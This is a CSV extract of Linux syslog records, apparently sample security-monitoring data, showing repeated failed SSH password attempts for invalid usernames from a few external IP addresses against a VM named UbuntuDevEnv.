+10326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:50,UbuntuDevEnv,2019-06-25 23:14:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:52,UbuntuDevEnv,2019-06-25 23:14:51,auth,UbuntuDevEnv,info,Failed password for invalid user knoxville from 138.68.12.43 port 60192 ssh2,55831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,knoxville,138.68.12.4,60192,,
+10328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:52,UbuntuDevEnv,2019-06-25 23:14:51,auth,UbuntuDevEnv,info,Disconnected from invalid user knoxville 138.68.12.43 port 60192 [preauth],55831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,knoxville,138.68.12.4,60192,,
+10329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:14:52,UbuntuDevEnv,2019-06-25 23:14:51,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 60192:11: Bye Bye [preauth],55831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,60192,,
+10330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:04,UbuntuDevEnv,2019-06-25 23:15:04,auth,UbuntuDevEnv,info,Invalid user qody from 77.232.128.87 port 52950,55919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qody,77.232.128.8,52950,,
+10331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:04,UbuntuDevEnv,2019-06-25 23:15:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,55919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:04,UbuntuDevEnv,2019-06-25 23:15:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:07,UbuntuDevEnv,2019-06-25 23:15:06,auth,UbuntuDevEnv,info,Failed password for invalid user qody from 77.232.128.87 port 52950 ssh2,55919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qody,77.232.128.8,52950,,
+10334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:07,UbuntuDevEnv,2019-06-25 23:15:06,auth,UbuntuDevEnv,info,Disconnected from invalid user qody 77.232.128.87 port 52950 [preauth],55919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qody,77.232.128.8,52950,,
+10335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:07,UbuntuDevEnv,2019-06-25 23:15:06,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 52950:11: Bye Bye [preauth],55919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,52950,,
+10336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:30,UbuntuDevEnv,2019-06-25 23:15:30,auth,UbuntuDevEnv,info,Invalid user microvolts from 203.195.235.135 port 43220,56070,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,microvolts,203.195.235.1,43220,,
+10337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:30,UbuntuDevEnv,2019-06-25 23:15:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56070,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:30,UbuntuDevEnv,2019-06-25 23:15:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,56070,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:32,UbuntuDevEnv,2019-06-25 23:15:32,auth,UbuntuDevEnv,info,Failed password for invalid user microvolts from 203.195.235.135 port 43220 ssh2,56070,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,microvolts,203.195.235.1,43220,,
+10340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:33,UbuntuDevEnv,2019-06-25 23:15:32,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 43220:11: Bye Bye [preauth],56070,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,43220,,
+10341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:15:33,UbuntuDevEnv,2019-06-25 23:15:32,auth,UbuntuDevEnv,info,Disconnected from invalid user microvolts 203.195.235.135 port 43220 [preauth],56070,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,microvolts,203.195.235.1,43220,,
+10342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:17:03,UbuntuDevEnv,2019-06-25 23:17:02,auth,UbuntuDevEnv,info,Invalid user zzzz from 138.68.12.43 port 48154,56708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zzzz,138.68.12.4,48154,,
+10343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:17:03,UbuntuDevEnv,2019-06-25 23:17:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:17:03,UbuntuDevEnv,2019-06-25 23:17:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,56708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:17:05,UbuntuDevEnv,2019-06-25 23:17:04,auth,UbuntuDevEnv,info,Failed password for invalid user zzzz from 138.68.12.43 port 48154 ssh2,56708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zzzz,138.68.12.4,48154,,
+10346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:17:05,UbuntuDevEnv,2019-06-25 23:17:04,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 48154:11: Bye Bye [preauth],56708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,48154,,
+10347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:17:05,UbuntuDevEnv,2019-06-25 23:17:04,auth,UbuntuDevEnv,info,Disconnected from invalid user zzzz 138.68.12.43 port 48154 [preauth],56708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zzzz,138.68.12.4,48154,,
+10348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:18:37,UbuntuDevEnv,2019-06-25 23:18:36,auth,UbuntuDevEnv,info,Invalid user tmp from 196.27.127.61 port 58833,57133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,196.27.127.6,58833,,
+10349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:18:37,UbuntuDevEnv,2019-06-25 23:18:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:18:37,UbuntuDevEnv,2019-06-25 23:18:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,57133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:18:39,UbuntuDevEnv,2019-06-25 23:18:39,auth,UbuntuDevEnv,info,Failed password for invalid user tmp from 196.27.127.61 port 58833 ssh2,57133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,196.27.127.6,58833,,
+10352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:18:39,UbuntuDevEnv,2019-06-25 23:18:39,auth,UbuntuDevEnv,info,Disconnected from invalid user tmp 196.27.127.61 port 58833 [preauth],57133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,196.27.127.6,58833,,
+10353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:18:39,UbuntuDevEnv,2019-06-25 23:18:39,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 58833:11: Bye Bye [preauth],57133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,58833,,
+10354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:19:14,UbuntuDevEnv,2019-06-25 23:19:14,auth,UbuntuDevEnv,info,Invalid user user5 from 138.68.12.43 port 36110,57258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user5,138.68.12.4,36110,,
+10355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:19:14,UbuntuDevEnv,2019-06-25 23:19:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,57258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:19:14,UbuntuDevEnv,2019-06-25 23:19:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:19:16,UbuntuDevEnv,2019-06-25 23:19:16,auth,UbuntuDevEnv,info,Failed password for invalid user user5 from 138.68.12.43 port 36110 ssh2,57258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user5,138.68.12.4,36110,,
+10358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:19:16,UbuntuDevEnv,2019-06-25 23:19:16,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 36110:11: Bye Bye [preauth],57258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,36110,,
+10359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:19:16,UbuntuDevEnv,2019-06-25 23:19:16,auth,UbuntuDevEnv,info,Disconnected from invalid user user5 138.68.12.43 port 36110 [preauth],57258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user5,138.68.12.4,36110,,
+10360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:20:39,UbuntuDevEnv,2019-06-25 23:20:38,auth,UbuntuDevEnv,info,Invalid user sublink from 196.27.127.61 port 38923,57578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,196.27.127.6,38923,,
+10361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:20:39,UbuntuDevEnv,2019-06-25 23:20:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:20:39,UbuntuDevEnv,2019-06-25 23:20:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,57578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:20:40,UbuntuDevEnv,2019-06-25 23:20:40,auth,UbuntuDevEnv,info,Failed password for invalid user sublink from 196.27.127.61 port 38923 ssh2,57578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,196.27.127.6,38923,,
+10364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:20:40,UbuntuDevEnv,2019-06-25 23:20:40,auth,UbuntuDevEnv,info,Disconnected from invalid user sublink 196.27.127.61 port 38923 [preauth],57578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,196.27.127.6,38923,,
+10365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:20:40,UbuntuDevEnv,2019-06-25 23:20:40,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 38923:11: Bye Bye [preauth],57578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,38923,,
+10366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:21:21,UbuntuDevEnv,2019-06-25 23:21:20,auth,UbuntuDevEnv,info,Invalid user soporte from 138.68.12.43 port 52304,57723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soporte,138.68.12.4,52304,,
+10367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:21:21,UbuntuDevEnv,2019-06-25 23:21:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,57723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:21:21,UbuntuDevEnv,2019-06-25 23:21:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:21:22,UbuntuDevEnv,2019-06-25 23:21:22,auth,UbuntuDevEnv,info,Failed password for invalid user soporte from 138.68.12.43 port 52304 ssh2,57723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soporte,138.68.12.4,52304,,
+10370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:21:22,UbuntuDevEnv,2019-06-25 23:21:22,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 52304:11: Bye Bye [preauth],57723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,52304,,
+10371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:21:22,UbuntuDevEnv,2019-06-25 23:21:22,auth,UbuntuDevEnv,info,Disconnected from invalid user soporte 138.68.12.43 port 52304 [preauth],57723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soporte,138.68.12.4,52304,,
+10372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:22:35,UbuntuDevEnv,2019-06-25 23:22:34,auth,UbuntuDevEnv,info,Invalid user furnitura from 196.27.127.61 port 47244,57984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,furnitura,196.27.127.6,47244,,
+10373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:22:35,UbuntuDevEnv,2019-06-25 23:22:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,57984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:22:35,UbuntuDevEnv,2019-06-25 23:22:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:22:37,UbuntuDevEnv,2019-06-25 23:22:36,auth,UbuntuDevEnv,info,Failed password for invalid user furnitura from 196.27.127.61 port 47244 ssh2,57984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,furnitura,196.27.127.6,47244,,
+10376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:22:37,UbuntuDevEnv,2019-06-25 23:22:36,auth,UbuntuDevEnv,info,Disconnected from invalid user furnitura 196.27.127.61 port 47244 [preauth],57984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,furnitura,196.27.127.6,47244,,
+10377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:22:37,UbuntuDevEnv,2019-06-25 23:22:36,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 47244:11: Bye Bye [preauth],57984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,47244,,
+10378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:23:26,UbuntuDevEnv,2019-06-25 23:23:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58161,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:23:26,UbuntuDevEnv,2019-06-25 23:23:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,58161,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:23:26,UbuntuDevEnv,2019-06-25 23:23:25,auth,UbuntuDevEnv,info,Invalid user isabelle from 138.68.12.43 port 40258,58161,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,isabelle,138.68.12.4,40258,,
+10381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:23:28,UbuntuDevEnv,2019-06-25 23:23:28,auth,UbuntuDevEnv,info,Failed password for invalid user isabelle from 138.68.12.43 port 40258 ssh2,58161,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,isabelle,138.68.12.4,40258,,
+10382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:23:28,UbuntuDevEnv,2019-06-25 23:23:28,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 40258:11: Bye Bye [preauth],58161,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,40258,,
+10383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:23:28,UbuntuDevEnv,2019-06-25 23:23:28,auth,UbuntuDevEnv,info,Disconnected from invalid user isabelle 138.68.12.43 port 40258 [preauth],58161,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,isabelle,138.68.12.4,40258,,
+10384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:24:37,UbuntuDevEnv,2019-06-25 23:24:37,auth,UbuntuDevEnv,info,Invalid user bmakwembere from 196.27.127.61 port 55565,58416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmakwembere,196.27.127.6,55565,,
+10385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:24:37,UbuntuDevEnv,2019-06-25 23:24:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
